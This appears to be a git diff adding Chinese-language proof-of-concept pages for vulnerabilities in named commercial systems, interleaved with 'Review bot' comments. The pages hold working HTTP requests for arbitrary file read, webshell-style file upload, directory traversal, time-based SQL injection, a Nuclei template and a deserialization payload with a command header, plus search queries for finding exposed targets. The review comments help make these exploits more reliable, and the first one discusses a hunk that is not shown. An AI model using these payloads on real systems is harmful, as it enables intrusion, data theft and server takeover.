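Review bot: the hunk never says what in the SOAP response indicates success. The payload concatenates a marker: `CHAR(113)+CHAR(112)+CHAR(122)+CHAR(120)+CHAR(113)` is `qpzxq`, the trailing `CHAR(113)+CHAR(112)+CHAR(118)+CHAR(122)+CHAR(113)` is `qpvzq`, and the random letters between them sit in the eighth of nine `UNION ALL SELECT` columns, so the check is that the response body contains `qpzxq…qpvzq`; state that. The `+` string concatenation and `CHAR()` also identify the backend as SQL Server, which the page should mention since it determines follow-up payloads. The injection point is the `CargoOwner` field of the JSON carried inside the `<data>` element of `getItemInfo`; the one-line description just repeats the title and should say that. The fence is tagged `javascript` for a raw HTTP/SOAP request.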
@@ -0,0 +1,23 @@ +# 云连POS-ERP管理系统downloadFile存在任意文件读取漏洞 + +云连POS-ERP管理系统downloadFile存在任意文件读取漏洞 + +## fofa +```javascript +title="Powered By chaosZ" +``` + +## poc +```javascript +POST /admin/file!download.action;admin!login.action HTTP/1.1 +Host: +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.84 Safari/537.36 +Accept-Encoding: gzip, deflate +Accept-Language: zh-CN,zh;q=0.9 +Content-Type: application/x-www-form-urlencoded +Connection: close + +downloadFile=../../WEB-INF/web.xml +``` + +![image-20241219151235140](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202412191512200.png) \ No newline at end of file diff --git a/亿华人力资源管理系统filemanage存在任意文件上传漏洞.md b/亿华人力资源管理系统filemanage存在任意文件上传漏洞.md new file mode 100644 index 0000000..d3401ee --- /dev/null +++ b/亿华人力资源管理系统filemanage存在任意文件上传漏洞.md 
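Review bot: the request path `/admin/file!download.action;admin!login.action` is doing two things the text does not explain: `file!download` is the `!method` dynamic-method-invocation form of a `.action` endpoint, and the `;admin!login.action` suffix after the semicolon appears to be what gets the request past the login check; a sentence on each would make the PoC understandable rather than a string to copy. Also state the success criterion (the response body is the `web.xml` document, so look for `<web-app`), note that `../../WEB-INF/web.xml` means the download base directory is two levels below the webapp root, and add a `Content-Length` for the body `downloadFile=../../WEB-INF/web.xml`. The description only repeats the title.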
@@ -0,0 +1,62 @@ +# 亿华人力资源管理系统filemanage存在任意文件上传漏洞 + +# 一、漏洞简介 +亿华人力资源管理系统是一款全面的人力资源管理软件,旨在帮助企业实现员工档案管理规范化、薪资管理自动化、招聘管理流程化等目标。该系统涵盖了人力资源管理的各个方面,包括员工档案管理、薪资管理、招聘管理、培训管理、福利管理等。亿华人力资源管理系统filemanage存在任意文件上传漏洞,攻击者可通过该漏洞获取服务器权限。 + +# 二、影响版本 ++ 亿华人力资源管理系统 + +# 三、资产测绘 ++ hunter`web.body="亿华人力资源管理系统"` ++ 特征 + +![1700719530357-795ccebb-a7d7-426f-ad2e-6292dafa922e.png](./img/WTXbO54ISXKjDEmu/1700719530357-795ccebb-a7d7-426f-ad2e-6292dafa922e-046567.png) + +# 四、漏洞复现 +```plain +POST /filemanage/file/default.aspx HTTP/1.1 +Host: xx.xx.xx.xx +User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:120.0) Gecko/20100101 Firefox/120.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 +Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 +Accept-Encoding: gzip, deflate +Content-Type: multipart/form-data; boundary=---------------------------13611309432955470360700636523 +Content-Length: 1170 +Connection: close +Cookie: ASP.NET_SessionId=2g3mplfduhthivdwifteza3q +Upgrade-Insecure-Requests: 1 + +-----------------------------13611309432955470360700636523 +Content-Disposition: form-data; name="__VIEWSTATE" + +/wEPDwULLTEzNjk1NjQwNjYPZBYCAgMPZBYGAgEPDxYCHgRUZXh0BQ0vRmlsZXNVcGxvYWQvZGQCAw8PFgIeB1Zpc2libGVoZGQCBA8PFgIfAWhkZBgBBR5fX0NvbnRyb2xzUmVxdWlyZVBvc3RCYWNrS2V5X18WAQUIQXV0b05hbWWy1sk+LR5PsSft3vRvaTFxMKfM4/Mdc2SRqdis5w3/ag== +-----------------------------13611309432955470360700636523 +Content-Disposition: form-data; name="__VIEWSTATEGENERATOR" + +5338F018 +-----------------------------13611309432955470360700636523 +Content-Disposition: form-data; name="fileToUpload"; filename="2.aspx" +Content-Type: image/png + +123 +-----------------------------13611309432955470360700636523 +Content-Disposition: form-data; name="UploadBtn" + +上传文件 +-----------------------------13611309432955470360700636523 +``` + 
+![1700989027405-0de5f0a6-b55e-4722-a428-fa3c48b6f79a.png](./img/WTXbO54ISXKjDEmu/1700989027405-0de5f0a6-b55e-4722-a428-fa3c48b6f79a-603997.png) + +上传文件位置 + +```plain +/FilesUpload/2.aspx +``` + +![1700989045882-fc17b807-e1fb-4552-9726-160375aba6ac.png](./img/WTXbO54ISXKjDEmu/1700989045882-fc17b807-e1fb-4552-9726-160375aba6ac-901354.png) + + + +> 更新: 2024-02-29 23:55:44 +> 原文: <https://www.yuque.com/xiaokp7/ocvun2/elmyeuhlruvlkvox> \ No newline at end of file diff --git a/亿华人力资源管理系统filemanage存在目录遍历漏洞.md b/亿华人力资源管理系统filemanage存在目录遍历漏洞.md new file mode 100644 index 0000000..7f8d420 --- /dev/null +++ b/亿华人力资源管理系统filemanage存在目录遍历漏洞.md @@ -0,0 +1,29 @@ +# 亿华人力资源管理系统filemanage存在目录遍历漏洞 + +# 一、漏洞简介 +亿华人力资源管理系统是一款全面的人力资源管理软件,旨在帮助企业实现员工档案管理规范化、薪资管理自动化、招聘管理流程化等目标。该系统涵盖了人力资源管理的各个方面,包括员工档案管理、薪资管理、招聘管理、培训管理、福利管理等。亿华人力资源管理系统filemanage存在目录遍历漏洞,可通过该漏洞查看网站源码及配置文件等敏感信息。 + +# 二、影响版本 ++ 亿华人力资源管理系统 + +# 三、资产测绘 ++ hunter`web.body="亿华人力资源管理系统"` ++ 特征 + +![1700719530357-795ccebb-a7d7-426f-ad2e-6292dafa922e.png](./img/zcWQQp8jsVRLBX-8/1700719530357-795ccebb-a7d7-426f-ad2e-6292dafa922e-732191.png) + +# 四、漏洞复现 +```plain +/filemanage/file/default.aspx +``` + +![1700989447803-6daa1ad8-0c21-4a3e-bcff-8558bef4a3da.png](./img/zcWQQp8jsVRLBX-8/1700989447803-6daa1ad8-0c21-4a3e-bcff-8558bef4a3da-078709.png) + +在转到目录除输入`../`即可跳转到网站目录查看网站源码及各类配置文件 + +![1700989498664-e661c4dc-8bd3-483b-a458-23c4c7cd667b.png](./img/zcWQQp8jsVRLBX-8/1700989498664-e661c4dc-8bd3-483b-a458-23c4c7cd667b-645753.png) + + + +> 更新: 2024-02-29 23:55:44 +> 原文: <https://www.yuque.com/xiaokp7/ocvun2/gnluyfnyo0do37cq> \ No newline at end of file diff --git a/亿华人力资源管理系统upfile存在任意文件上传漏洞.md b/亿华人力资源管理系统upfile存在任意文件上传漏洞.md new file mode 100644 index 0000000..2125b6d --- /dev/null +++ b/亿华人力资源管理系统upfile存在任意文件上传漏洞.md 
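Review bot: in the filemanage upload hunk the multipart body is not terminated: the last line is `-----------------------------13611309432955470360700636523` without the closing `--` (compare the upfile PoC, which ends with `...3243433393122674734542415452--`), so a replay tool will send an incomplete body and `Content-Length: 1170` has to be recomputed after the fix. The `__VIEWSTATE`, `__VIEWSTATEGENERATOR` and `ASP.NET_SessionId` values were captured from one instance; say whether they must be fetched fresh with a `GET /filemanage/file/default.aspx` first, because a viewstate copied from another install fails validation whenever viewstate MAC is enabled. In the directory-traversal hunk, "在转到目录除输入`../`" should read 处, and the page shows no request at all, only a UI instruction; add the POST parameter that carries the directory path so the traversal can be checked without a browser.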
@@ -0,0 +1,63 @@ +# 亿华人力资源管理系统upfile存在任意文件上传漏洞 + +# 一、漏洞简介 +亿华人力资源管理系统是一款全面的人力资源管理软件,旨在帮助企业实现员工档案管理规范化、薪资管理自动化、招聘管理流程化等目标。该系统涵盖了人力资源管理的各个方面,包括员工档案管理、薪资管理、招聘管理、培训管理、福利管理等。亿华人力资源管理系统upfile存在任意文件上传漏洞,攻击者可通过该漏洞获取服务器权限。 + +# 二、影响版本 ++ 亿华人力资源管理系统 + +# 三、资产测绘 ++ hunter`web.body="亿华人力资源管理系统"` ++ 特征 + +![1700719530357-795ccebb-a7d7-426f-ad2e-6292dafa922e.png](./img/iEv2oxqoEmhNMSu_/1700719530357-795ccebb-a7d7-426f-ad2e-6292dafa922e-674856.png) + +# 四、漏洞复现 +```plain +POST /FileManage/upfile.aspx HTTP/1.1 +Host: xx.xx.xx.xx +User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:120.0) Gecko/20100101 Firefox/120.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 +Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 +Accept-Encoding: gzip, deflate +Content-Type: multipart/form-data; boundary=---------------------------3243433393122674734542415452 +Content-Length: 659 +Connection: close +Cookie: ASP.NET_SessionId=2gs554ezsztrgmbwf1dffzls +Upgrade-Insecure-Requests: 1 + +-----------------------------3243433393122674734542415452 +Content-Disposition: form-data; name="__VIEWSTATE" + +/wEPDwUKMTEwMjM4NDkyMWRktbRwLggX8FeyROMxp865VQxNInwjdx6WjO4Wq+j8FUg= +-----------------------------3243433393122674734542415452 +Content-Disposition: form-data; name="__VIEWSTATEGENERATOR" + +BD080F3A +-----------------------------3243433393122674734542415452 +Content-Disposition: form-data; name="File"; filename="1.aspx" +Content-Type: image/png + +123 +-----------------------------3243433393122674734542415452 +Content-Disposition: form-data; name="UploadButton" + +开始上传 +-----------------------------3243433393122674734542415452-- + +``` + +![1700991001207-7dffd895-f687-4e82-bfa2-c117df04e750.png](./img/iEv2oxqoEmhNMSu_/1700991001207-7dffd895-f687-4e82-bfa2-c117df04e750-033334.png) + +上传文件位置 + +```plain +/FilesUpload/1.aspx +``` + 
+![1700991042096-6e61ec91-f9c2-4cc4-99f1-92b53c4a8f16.png](./img/iEv2oxqoEmhNMSu_/1700991042096-6e61ec91-f9c2-4cc4-99f1-92b53c4a8f16-289517.png) + + + +> 更新: 2024-02-29 23:55:44 +> 原文: <https://www.yuque.com/xiaokp7/ocvun2/xnk6usd7it2uhng6> \ No newline at end of file diff --git a/亿赛通CDG电子文档安全管理系统DelHookService存在sql注入漏洞(CVE-2024-10660).md b/亿赛通CDG电子文档安全管理系统DelHookService存在sql注入漏洞(CVE-2024-10660).md new file mode 100644 index 0000000..e35251c --- /dev/null +++ b/亿赛通CDG电子文档安全管理系统DelHookService存在sql注入漏洞(CVE-2024-10660).md @@ -0,0 +1,30 @@ +# 亿赛通CDG电子文档安全管理系统DelHookService存在sql注入漏洞(CVE-2024-10660) + +亿赛通CDG电子文档安全管理系统,该漏洞源于文件/com/esafenet/servlet/policy/HookService.java的参数hookId会导致SQL注入。 + +## fofa + +```javascript +body="/CDGServer3/index.jsp" +``` + +## poc + +```javascript +GET /CDGServer3/parameter/HookService;logindojojs?command=DelHookService&hookId=1';if(db_name()='CobraDGServer')+WAITFOR+DELAY+'0:0:5'-- HTTP/1.1 +Host: +Accept: */* +Accept-Encoding: gzip, deflate, br +Accept-Ldwk: bG91ZG9uZ3dlbmt1 +Accept-Language: zh-Hans-CN;q=1 +Connection: close +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36 +``` + +![img](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202411061657549.png) + + + +## 漏洞来源 + +- https://flowus.cn/share/9d33a5d8-87b1-482b-8642-a8fcf27585ba?code=G8A6P3 \ No newline at end of file diff --git a/亿赛通电子文档安全管理系统-UploadFileToCatalog-SQL注入漏洞.md b/亿赛通电子文档安全管理系统-UploadFileToCatalog-SQL注入漏洞.md new file mode 100644 index 0000000..f436a40 --- /dev/null +++ b/亿赛通电子文档安全管理系统-UploadFileToCatalog-SQL注入漏洞.md 
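Review bot: in the upfile hunk the same point as for default.aspx applies to the copied `__VIEWSTATE` (`/wEPDwUKMTEwMjM4NDkyMWRk...`) and `ASP.NET_SessionId` values; say whether they must be obtained from a fresh `GET /FileManage/upfile.aspx`. The uploaded `1.aspx` contains only `123`, so the success criterion is that `/FilesUpload/1.aspx` returns `123`; state that. In the DelHookService hunk the delay is gated on `if(db_name()='CobraDGServer')`, so a target whose database has a different name shows no delay and reads as not vulnerable; use an unconditional `WAITFOR DELAY '0:0:5'` for detection and keep the conditional form as the confirmation step. The `;logindojojs` suffix on `/CDGServer3/parameter/HookService` is presumably the auth-filter bypass and should be explained, and the header `Accept-Ldwk: bG91ZG9uZ3dlbmt1` is a watermark (base64 of `loudongwenku`) copied from the source, not part of the exploit; drop it.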
@@ -0,0 +1,68 @@ +## 亿赛通电子文档安全管理系统 UploadFileToCatalog SQL注入漏洞 + +亿某通电子文档安全管理系统 UploadFileToCatalog接口的id参数处对传入的数据没有预编译和充足的校验,导致该接口存在SQL注入漏洞,恶意攻击者可能通过该漏洞获取服务器信息或者直接获取服务器权限 + +## fofa +``` +body="/CDGServer3/index.jsp" +``` + +## poc +``` +POST /CDGServer3/js/../policy/UploadFileToCatalog?fromurl=../user/dataSearch.jsp HTTP/1.1 +Host: 127.0.0.1 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 +Accept-Encoding: gzip, deflate +Accept-Language: zh-CN,zh;q=0.9 +Connection: close +Content-Type: application/x-www-form-urlencoded +Upgrade-Insecure-Requests: 1 + +id=1';WAITFOR DELAY '0:0:3'-- +``` + +![8ce5da8fddd2d106e5eadb6e6c705f69](https://github.com/wy876/POC/assets/139549762/4fdf4a1c-f49a-47bc-9c1c-3d663b1d62e6) + +## Nuclei +``` +id: CDG-UploadFileToCatalog-SQL + +info: + name: 由于某赛通电子文档安全管理系统 UploadFileToCatalog接口的id参数处对传入的数据没有预编译和充足的校验,导致该接口存在SQL注入漏洞,恶意攻击者可能通过该漏洞获取服务器信息或者直接获取服务器权限 + author: WLF + severity: high + metadata: + fofa-query: body="/CDGServer3/index.jsp" +variables: + filename: "{{to_lower(rand_base(10))}}" + boundary: "{{to_lower(rand_base(20))}}" +http: + - raw: + - | + POST /CDGServer3/js/../policy/UploadFileToCatalog?fromurl=../user/dataSearch.jsp HTTP/1.1 + Host: {{Hostname}} + User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 + Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 + Accept-Encoding: gzip, deflate + Accept-Language: zh-CN,zh;q=0.9 + Connection: close + Content-Type: application/x-www-form-urlencoded + Upgrade-Insecure-Requests: 1 + + id=1';WAITFOR DELAY '0:0:5'-- + + + + + + matchers-condition: and + matchers: + - type: dsl + dsl: + - 'duration>=4 && 
duration<=7' + + - type: dsl + dsl: + - status_code == 200 +``` diff --git a/亿赛通电子文档安全管理系统AutoSignService1存在xstream反序列化漏洞.md b/亿赛通电子文档安全管理系统AutoSignService1存在xstream反序列化漏洞.md new file mode 100644 index 0000000..f62da5e --- /dev/null +++ b/亿赛通电子文档安全管理系统AutoSignService1存在xstream反序列化漏洞.md 
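Review bot: the nuclei template declares `variables: filename` and `boundary` that are never referenced in the raw request; delete them. The matcher `duration>=4 && duration<=7` paired with `WAITFOR DELAY '0:0:5'` reports a target as not vulnerable whenever base latency exceeds about 2 s, which is common on the slow hosts this kind of appliance runs on; either raise the upper bound or compare against a baseline request without the delay. The manual PoC above it uses a 3 s delay while the template uses 5 s; pick one so the window and the payload agree. The path `/CDGServer3/js/../policy/UploadFileToCatalog` (going through `/js/` and back up into `/policy/`) and the `fromurl=../user/dataSearch.jsp` parameter look like the authentication bypass, and neither is explained in the text; the `id` parameter in the body is the only thing the description names.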
@@ -0,0 +1,36 @@ +# 亿赛通电子文档安全管理系统AutoSignService1存在xstream 反序列化漏洞 + +# 一、漏洞简介 + 亿赛通文档安全管理系统是国内最早基于文件过滤驱动技术的文档加解密产品,保护范围涵盖终端电脑(Windows、Mac、Linux系统平台)、智能终端(Android、IOS)及各类应用系统(OA、知识管理、文档管理、项目管理、PDM等)。亿赛通电子文档安全管理系统AutoSignService1存在xstream 反序列化漏洞 + +# 二、影响版本 ++ 亿赛通电子文档安全管理系统 + +# 三、资产测绘 ++ hunter`app.name="ESAFENET 亿赛通文档安全管理系统"` ++ 登录页面 + +![1693912211487-1ee3eb84-62a3-4c32-806a-6be32537dfb6.png](./img/tK-eUSHk6FfLxBID/1693912211487-1ee3eb84-62a3-4c32-806a-6be32537dfb6-136380.png) + +# 四、漏洞复现 +```plain +POST /CDGServer3/AutoSignService1 HTTP/1.1 +Accept: */* +User-Agent: Mozilla/5.0 +Connection: close +Accept-Encoding: gzip, deflate, br +Accept-Language: zh-CN,zh;q=0.8 +Content-Type: text/xml +Host: 192.168.110.187:8090 +cmd: whoami +Content-Length: 14756 + +NNLINELBIIKEOGPIFLNMHIPNNOHFNECLEHKBCIHIFHCMONPDPHOHMONIOCNLPBOKNAEEBHFCIFNMDPDAACABKCKIAEMBPOIBGPMNEIPJAOGBILDKMLDGAENLPAFBKFPFELKLGCEBMBMNKOIBMPHCIODCCEHOKPCEDHPNLONIODEGNCPIGDFMGMDPOMMEDIJNFKDCHHBFMFGBDOIOAHLOHNAMDBJABECIJOEHKAPJCBDIDJHKAMAGEELEHJEEIDBDILILANAKCIIGLMDIDDMOPNCNGLPPOMMIGCEFEBIMDHFAGLHIDHPJCHAEHFPHNHJGJKJDCINLAHOAPCDJNIABODKBFABJMFIEMLLPGGKNNNFCAOBHCOEOHCBFOFGBBPLKPHLLNOCJAKJDJPOEPBEKKPHOPBHFLJLNOGLABIJHIBOFFCPCLPAGLCEAONCAGIJFAEFOLKOLENHNFBOJIAOFJKBFMGNKBEECKKJPCECMFKPPPKEGOIOBHIBIBAGBIKAMOFLEKDKODMHGJOCEPEBNIHPFKEKKMCENNPHEODFNIOPMHFPPNFFIJEEJPPIMGPKHDOACKEEJACLCOKIPFHHECFDFJNMIFNGHLCOFLPDACOOALCNKBOEBPNPCKCKNJJJJANLFPKGLOINAIODAJNHAEDLBNONDJHPFELIJMNLMHEMBFGOHELCDBFHIFALDIIMBFEOHNHBOIOMLCJKCPHJPNDLPHDDCFJNMGKDMEINHIDLEGMOCNAFDAHOMPPIFFBPFCHAPPIDAIAILKODLCALBBJNPCGLPKIEOLEOMKEMBLMLBEGKNGCOKOFIPBCFAAHGCIMCAKFFLFIBDHCDFHMKKNDHLCGIMMNKMBJDGIDJMMGEOEGJNJDNNEKFDMEAHMILDKIFBGKGEJCMGOFEKGJEMNAFLDGEEOBKOHADBAMHBMDJOGIFPMDKIILIGAEELNEOAKNEFHDOGHOPBDICEALJIENFKHFCEHMPBJLCFPDHDGBBFIMKHLLFIHONFDJAIEJJLPPFMAEHBHDEBOIDLCMCIKAFBEBFEBGJEECDEINCPNPKIENONIMPBJCCMCHOAJHHDKDKEGJGDGJDJIDEHNNLNNHEONJEJHNLHLPMBBEJDLLJLLNPKIMGHLOFMMKBDEBHNFLPGEOKMHOFNBLLAALGMKNJONNGIOJLBFECJNLKHMBCKELDPBDMBFEHAKBHEMNDFBBEDCAMMHNNGMDGLNJ
HJDAGPILNGBEDCDJBCJOAMOBIFLOFCFIJKDELPPFLFBOHHNIBEGOOFEFGAENOKBMPCBDELFJPAHICDPGANJALHFENMFHAJLNECAEGOGCBOIDLJENHCEDMAOEEOFKLDEBJEJOBCFLPEIEAGPOILBEGOKPOAAPGMICFMFLJNDMBGAJJPKNLIBOAABJLNADADNALIKHDJMDKGOPELEHGPDGNJHAAJKICHBFGMHCLEPFHCCKNFKPEOMHPLMOHBGDHCOGEIGPMIGLAHKBCEDHFGLDIKIIIMEPHMIMCIGJJDCKIEODLKCKOLAKBFHIBHOPNAMPEIKHCMDPNMLACKHOGJAEMBJPFEBOCPBGGAFGGNCOBEAIPANPLIBGDCCNMDNDNOIPOECCPELCEDPGCNJHEIOIFPJDKIFNJGHAHLHFNPICIJLHELMODMJIEGMMBNMMFBEJCDDDFOPAJOMBNKBDBGKKMLKCBBPFOOJCKFFIMLCODLOFNOIEHENLJNOFDAMKFLHIADBNGANHIANHOCHLILNJLOCOHFHMNFHALJHOPGKLOPHLMELJFBIABENFKEHCLIKMFGHPPJFIBBANPIOFKEEBIFIBDIIAIKENFILIDPDELJDMOPFKBOHPGLIPMNCFJFDCJGKCFOAJMPIIBEOHJPPNHLOCINIECHMJJMCKHICOMIMLHJAOJIGIFLMINANOFADOGDLLHCEKPECHDFBGIPEPNJBJOGLHDLKFLBFPLPFAENMMIFOMMNCJGJJFPGFHOKMAGCEOCKMJJPPAFBNEAKOAMMEHPGCBAJCHDBGJANBBHGIBMPHAMCEHEFLBAGOKDPKIPPDFLJIADKKOJPEPIGAKPCGKBNFBPLLKLEGBPJJCDJFGHDMLPNJBGFMLGMCABONHBLHPKHKEGJIBPFKCLMBIKKOMINPAJEPFHANBIBKMPHKEODCBMMIGAEFCENBNKDONGNLBADGDLJBMJGKEMNJOMPHDOPALIGEPCEDDAHJMNMJBFLIPBODEDCDAPMNGCANOCPLLMJOCPMPJDMEAMEPELICJKJLODAJEILBOJNFAJOFNOGCHGOJEGMGCPNCDEECKPAIAOHCLJBBFDKKAIHOJEKDBOFMFOBEDLNGJNIAJPLGMHBLHODIKDLEPOINDPDDIGKOLGEOBFFPMOHLBEALFIGAKNDKEKEJMJLNGHNANLCGLPNLBBFNKNEKCGBJKJDABFNAGPDILHBAAIECKBLKEDIJIMPJOMFLHBMOBLEKNEHINHAKBOHICLGBBPIEJIKALMIJHKHFIDNICAEEFPGGPBCBFPOJDFFKAGKAEOOCPMGCCMHPCIKHCODDCNGDDNDLAIMAPEMPNECNFPIALJELGOIHECEKHBHOHNIFCBJBFAOKKDCMNHHINAFGNECFPOGHBNMPJOECCFOCHICANBDOCCELJCENBMIMBKCNJAEMBHLOJOGALHGLLOEBFGFJAOFJHEGNLCEBCHGLNFEEIDOKIJNDHDANFPGLEMHOIJHOOJGKLGHBFBMBPBKEFOAKAIAGDMBLDEKLFKADKHNPAKBNPDKFIOAMAKKEHFNDABEPGKBMFCDFFOCIPDDEBOBFONDJFAJIJBAMGNBMCMJODGEGKIMIOLLAKMKJJAOCEMOBDCODALCKGKKKIADHOFMLNDGJBEMLLJPJOKPAIDACMPCOKAGKLIIMDENPNMEIBBMIFHGJKLKGPNOBJGMMLDKFKALLFHFDGDBDBMPOPDBLDNMAALEMAHGINFECKFHKJHFOCDJNBEDNGJCNENGIDHBJOLHEPFLEPHOOGJKFEGFLEMLGKDOOKIMAJIBJKOLAKCHBJJFDIGEMPABDNJFGMDAGEDIOHJKOAEHPLIBOFLIMFIEFOOGDHDNLCKOKPEDKEEBPAHKFMKBNNBAMICPOPLNPIGLMPDLAFBIEPHPJBFLBDECCPFINEBGMPMECAICGFLMJEKEIKDOKJMOAJLFNHHEHEPDAMFLNPKCDPODPLMFFA
MILMAFIDBDJJOKIJKGJACMOMEHDDCJJAAOAFJDCCEFHKMJNDJEOLOOIHCFIILOIGCOPDHENDDEODNJAJJFHNJIBJGJPFFKEDPBJAKIPHPKELOMHNFABNMIMODOGPBOFLLPBGAHCEOBBFJLKNAMKACHIOMMFLAPFJCHBIJAAEJELEFFEIMAMCACJBBGADJDJKKEHMGJCPCNIMKCPGHBPIFADBGGBPCIKNBGDCJJCPMABJINOGLAPAHGLJLADBJKFLNAAFKFOBIJKCFIDEKNFGFCHDPGLKFDKPPHPNCFIGAMHBNHMLJAHOKKFLNOCNDNPPJJHBBKHDIIENFAGAHOMFPNNBGDLDEHLBDOKEOAEFPPCIEPGIOAHDEEMIKDPHBMADGLNILDCIEKELEBBEOBKLCDLKLKLLKHDHBHGDDLHOHGPPANCDABBHHBDOOLEOAKBKDBPGLKFFFFOBLBHAPEELFFDEPOFFHIGOGDKMBIAMJNNOOFGCNHBCCCFKCAOFDDDCBPLMMHGBLEDOPNEHBOECJGFMFOEIEIFAHLCOOAOLBFFKHAHIEMAEOBBPMBJNDMJJDMNJEMBGMNEPCFODGCOCKJICOBEGAFJKFADJOFMGPILCDMBFLLLAHEKPBCDJEBMHDLBLDLLCIAGNJJBFHFOIPLNNOFAFNOMFPBPNFLPLFFNNBBNEPBHBKJEOHBJPMOHHEKFHGACPFPDAHPCAPPGPKBJBGGNIPLOHFPAPHLHCJJHNGNKOMDMIECKACEPHCFJJAIPLCEOFNLBAFGFLBLNBPAHBOOJOKHIBAJFEAEKBNHHODNJNMEONLHDIPPCJJAEKOOELNHPDPAEPPBILHLHELMDHGPJMILIEOFJHBIJHAIPPKCIJKKANAAKEDNDAILJPGJLIBJMABMPDMHGPNALCCAIIAMJMFGJDOIPEFEBMMOBABIKBMMHMFHLBEFFLAGJLNMDEAOALFJGOGNFMFEFKPMNCNNEFMJNADLNIILEGKLOOHMBHPJJCNFBPKIKMAIEIANCNDLOODENILDEJELHACIBBOCINOOFNPMINIFDEFMPBNDMFGHJHNKCKDECBJIBFMIMBGFCIHDJAKCPNAPNMOIKJIDLPJCIKNOGJDBALIDJPCNICIAIPNGPCLDBGPIFLGDPNDOODLHJPLHFILLLKDJHHDIBODNIPFLCAKAFMGCAAMKOEOPLJAAAPDAHJAJHIHGPDFLNALHAPHIOBEDFICNIHJLFALHJKNLFLBKIHIFNAIIFBILLNOAIOKFMLEPDIKMHGNMDLKBIEGLFHDNPPDFPEDPGOLPICMJPOFEAJJMHGKPJEJNEMJGIPKBDHEGLILBLJIEICMNINFCHAOGJNMIHPAOJCCFNJHGJCJEMJJPCNFDKKGDJCDFBPGNKGDMPEBIIMLMBBAOGBOPAEFOMIHEJCKJGBLFFOGNGOFPPJEFNPLFPOGPICGIKMGPNIKNOELEMAGNHKHOIKAILJBMJJIPABBGPICCMPNFPHHFHKDAHJKBMAHDBKLAJKPJFHOICCDFKJEDGGFDKPGJLKFJJJKCOANLNPDEJLHBBHJJGMNJPHFCHGINMJIMBDCBCDOHKDANDLFDOOCEADNHODFKGLBGAPAAONECAEACNDKGFGIMDAAKMLJJLAGKCJDECINGDJAHONECBMFDKMCKHOKADAPGBOKOGPEDFMHKFBDEBOMKNMELIALJHOHGOCAMKJCFECMNCODNHGIFBFIIJMPEHGNBDNGHICBLIGCOPDHENDDEODNJAJJFHNJIBJGJPFFKPBFOBDLLOIBAHALODFMHODOHOPGPMGLIPIJONOFCGMELPFMKMMCPFFNMILJFONAACCBCIJFCAFHOHLBALEIGHDPMMFMFIHKJBAGGGBDEDNCDHEJALEBDPIIEGCKGKMPLGKJGEJAJPMIFCDBAELNMDPNKFCAEGJCAFJPJBBMPLMEIGCNPOLIGHCLGMEJLKCHEPGBJCCDECFMKIBLFIG
OFEJKPGAHIGOHNOKMLOHLKDIPAPMFOPBHDBMAAEBEOKBEMEHIILJENNPKHJIMJMNLGHMAENHOHGMEFLKPJJBHDGLGAAMIGDMDCHBMICMDKNGPCOPEKDEMFLKINAMOKNDLDBABNGLFPJHFMKMBBCAEJDENPHGJGGPLMIIHHIAHGIBOINFBNCKJLJIGEPNAOGJFAFPDDBHEBCKNNJKJDLBPHHDNNCEDGAKHGOKPMCLOOPIHHNFMNFOILEAOIFGOJGPDCBLNGLEIOHHHAJPFPGLJNFFHKCNMFGHAHANBJLHJFNNLIBEIFKHJHMENIIOONPDMFOCPKEDHHMEPHAJKGALDFDBOFKBOCDDAFLJBDIENKOHGJPHGLOPDMIEPDBHBBEILLFPOAKJKJAPFKAOMLFOJBLAAEAIFLBOMGECGDBILGNGBEHDEOFLOLHJKAOJMJKNNLKNDHAPCKCHLAFHMCCLNNIIGJLDLCCOALPEPPNEBDNPGEMMPFFALFDONIGHJEMJGJGPLKDKMBGCLJEPLHDBOIKMNGELEKLJLFFAEEEDMBJFLJGGHMPHADEJEJLKJCMLNFIELFBOKAOPCIMCEBFNGMECGFAMMNOMCHKEIJGGNIHKPBFJLKODLLABGBJANDJFBJNBDHIDNGJGLAOFHGFBMJAFJNNLKNBAALOGIIHFMIOLDOEEFNNJDFLIMNBAHJGPJBDHIKGHCDMMLKFOHOJFLOLHHCEJACKLGHIBJHJHGMECCLNHBDGHFNPNOFEJKKOMEFONNBANBKOLDEMFCMDLNLGDBFEOIKAFJDAHAEJHMIJGJFAOJIHAIBHOOEMHHCOODAIEOEBFLMNAMDIIDLDHAIJDBKCMGKJFHHFKKGABCJCPHBBKDBPGLKFFFFOBLBHAPEELFFDEPOFFHIINLEMPICLDNGAEELNGONJIKOPFIJBJIPDGPLEDMHNJJHLBJDDGNDIHECEJNEFNLEHNHFCFOEEEGFIOKCPENDLNJJHGFJGAMNFLNFFIMPGKEMKKAMEPBAHBKBHGGIEANHFOKPEDDNLADKABNLJPONGDIGMCLENLOBAKMEPODENJNNDPEOCCLMLOJDJPPPMEFLBFLAIDHNCCHDDONIDPMKIOAGODDPKHDBGFCIGOAFLPBMELEPDHECABPOFMOKJECEHKIJIKHLCEFMAIGEKAALLCMMCDLPHELOCEDNIAIIHJCGFHJFBBKFKCFOBAABJEIMEIMDPEPCHKEBCEMIPECMAJGCEKHGOKOGFNHHFMKOICKKBKKKBDGDPCGLGMGALDDMEEFILPFO